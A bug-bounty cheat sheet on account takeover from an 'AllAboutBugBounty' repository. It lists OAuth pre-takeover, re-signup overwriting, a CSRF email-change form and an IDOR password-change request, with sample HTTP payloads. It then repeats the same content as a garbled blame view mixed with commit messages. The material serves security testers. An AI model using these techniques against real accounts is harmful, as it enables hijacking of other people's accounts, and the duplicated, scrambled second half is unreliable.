AllAboutBugBounty/Misc/Account Takeover.md

# Account Takeover

## Introduction
Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.

## How to exploit
1. Using OAuth Misconfiguration
   - Victim has a account in evil.com
   - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
   - Attacker changed his/her email to victim email.
   - When the victim try to create an account on evil.com, it says the email already exists.

2. Try re-sign up using same email
   ```
   POST /newaccount HTTP/1.1
   ...
   email=victim@mail.com&password=1234
   ```
   After sign up using victim email, try signup again but using different password
   ```
   POST /newaccount HTTP/1.1
   ...
   email=victim@mail.com&password=hacked
   ```

3. via CSRF
   - Create an account as an attacker and fill all the form, check your info in the Account Detail.
   - Change the email and capture the request, then created a CSRF Exploit.
   - The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account.

   ```html
   <html>
   <body>
      <form action="https://evil.com/user/change-email" method="POST">
         <input type="hidden" value="victim@gmail.com"/>
         <input type="submit" value="Submit Request">
      </form>
   </body>
   </html>
   ```

4. Chaining with IDOR, for example
   ```
   POST /changepassword.php HTTP/1.1
   Host: site.com
   ...
   userid=500&password=heked123
   ```
   500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID

5. No Rate Limit on 2FA

References:
- [Pre-Account Takeover using OAuth Misconfiguration](https://vijetareigns.medium.com/pre-account-takeover-using-oauth-misconfiguration-ebd32b80f3d3)
- [Account Takeover via CSRF](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
- [How re-signing up for an account lead to account takeover](https://zseano.medium.com/how-re-signing-up-for-an-account-lead-to-account-takeover-3a63a628fd9f)
-												Grouping, adding recon and some tips

											
										
										
											2021-02-09 02:15:31 +00:00
+								# Account Takeover
-												Update structure each readme

											
										
										
											2022-06-15 10:38:42 +00:00
+								## Introduction
-												Grouping, adding recon and some tips

											
										
										
											2021-02-09 02:15:31 +00:00
+								Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
-												Update structure each readme

											
										
										
											2022-06-15 10:38:42 +00:00
+								## How to exploit
-												Grouping, adding recon and some tips

											
										
										
											2021-02-09 02:15:31 +00:00
+. Using OAuth Misconfiguration
 								   - Victim has a account in evil.com
 								   - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
 								   - Attacker changed his/her email to victim email.
 								   - When the victim try to create an account on evil.com, it says the email already exists.
 . Try re-sign up using same email
 								   ```
-												Added Joomla and SSRF, and doing some major changes

											
										
										
											2022-07-09 15:35:32 +00:00
+								   POST /newaccount HTTP/1.1
 								   ...
-												Grouping, adding recon and some tips

											
										
										
											2021-02-09 02:15:31 +00:00
+								   email=victim@mail.com&password=1234
 								   ```
 								   After sign up using victim email, try signup again but using different password
 								   ```
-												Added Joomla and SSRF, and doing some major changes

											
										
										
											2022-07-09 15:35:32 +00:00
+								   POST /newaccount HTTP/1.1
 								   ...
-												Grouping, adding recon and some tips

											
										
										
											2021-02-09 02:15:31 +00:00
+								   email=victim@mail.com&password=hacked
 								   ```
 . via CSRF
 								   - Create an account as an attacker and fill all the form, check your info in the Account Detail.
 								   - Change the email and capture the request, then created a CSRF Exploit.
 								   - The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account.
 								   ```html
 								   <html>
 								   <body>
 								      <form action="https://evil.com/user/change-email" method="POST">
 								         <input type="hidden" value="victim@gmail.com"/>
 								         <input type="submit" value="Submit Request">
 								      </form>
 								   </body>
 								   </html>
 								   ```
 . Chaining with IDOR, for example
 								   ```
-												Added Joomla and SSRF, and doing some major changes

											
										
										
											2022-07-09 15:35:32 +00:00
+								   POST /changepassword.php HTTP/1.1
-												Grouping, adding recon and some tips

											
										
										
											2021-02-09 02:15:31 +00:00
+								   Host: site.com
-												Added Joomla and SSRF, and doing some major changes

											
										
										
											2022-07-09 15:35:32 +00:00
+								   ...
-												Grouping, adding recon and some tips

											
										
										
											2021-02-09 02:15:31 +00:00
+								   userid=500&password=heked123
 								   ```
 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID
 . No Rate Limit on 2FA
 								References:
 								- [Pre-Account Takeover using OAuth Misconfiguration](https://vijetareigns.medium.com/pre-account-takeover-using-oauth-misconfiguration-ebd32b80f3d3)
 								- [Account Takeover via CSRF](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
 								- [How re-signing up for an account lead to account takeover](https://zseano.medium.com/how-re-signing-up-for-an-account-lead-to-account-takeover-3a63a628fd9f)